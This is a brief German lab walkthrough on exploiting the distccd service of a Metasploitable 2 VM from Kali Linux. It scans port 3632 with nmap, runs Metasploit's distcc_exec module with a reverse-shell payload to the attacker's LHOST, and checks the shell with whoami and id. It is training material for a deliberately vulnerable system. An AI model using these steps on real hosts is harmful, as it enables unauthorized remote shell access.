
In diesem Video wird gezeigt, wie man die Schwachstelle im distccd-Dienst auf dem Metasploitable-2-System ausnutzt, um über Kali Linux eine Remote-Shell zu erhalten.
nmap -sV -p 3632 192.168.56.102
✅ Das Ergebnis sieht so aus:
3632/tcp open distccd v1
👉 Also ist distcc offen und kann ausgenutzt werden.
msfconsole
use exploit/unix/misc/distcc_exec
show options
Erforderliche Parameter:
Option Wert RHOSTS Metasploitable-IP RPORT 3632 PAYLOAD cmd/unix/reverse
set RHOSTS 192.168.56.102
set PAYLOAD cmd/unix/reverse
set LHOST 192.168.56.101
LHOST — Ihre Kali-Linux-IP-Adresse
run
🎉 Ergebnis
Bei Erfolg:
[*] Command shell session opened
Wir prüfen die Shell:
whoami
uname -a
id